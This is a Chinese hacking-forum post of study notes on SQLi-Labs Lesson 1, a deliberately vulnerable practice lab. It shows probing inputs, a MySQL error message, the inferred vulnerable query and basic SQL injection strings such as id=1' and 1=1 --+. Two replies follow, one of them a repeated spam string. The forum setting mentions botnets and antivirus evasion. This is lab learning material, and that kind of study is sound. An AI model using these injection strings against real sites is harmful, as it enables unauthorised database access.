第一课：SQLi Labs 学习笔记 注入……

水漫金山

论坛貌似都是玩远控 抓鸡的  研究渗透的比较少啊……我就是不会免杀所以来论坛学习的 顺便发几篇渗透文章吧   这篇是注入学习笔记……
主要是思路  论坛貌似没代码高亮插件  该高亮的地方我就直接变色了
第一课 Less1（基于错误提示）

1. 由 ?id 的变化，可以得出账号是由get提交的id参数得到的。

复制代码

初步判断：

1. $sql = select * from db where id= $_GET['id'];
   

复制代码

1. 输入测试代码 and 1=1 和  and 1=2，返回都为正常
    2. 输入测试代码 ' 报错，之后输出 \ 查看报错提示

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5\' LIMIT 0,1' at line 1

由 '5\' LIMIT 0,1     可以得出最终的sql查询语句：

1. $id=$_GET['id'];
   
2. $sql =select * from db where id='$id' limit 0,1;

复制代码

注入语句：

1. id=1' and '1'='1
   
2. id=1' and 1=1 --+

复制代码

游客，如果您要查看本帖隐藏内容请回复

寂寞黑客

O(∩_∩)O谢谢！！！！！！！顶！d=====(￣▽￣*)b。。。。

红裤衩

x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471x471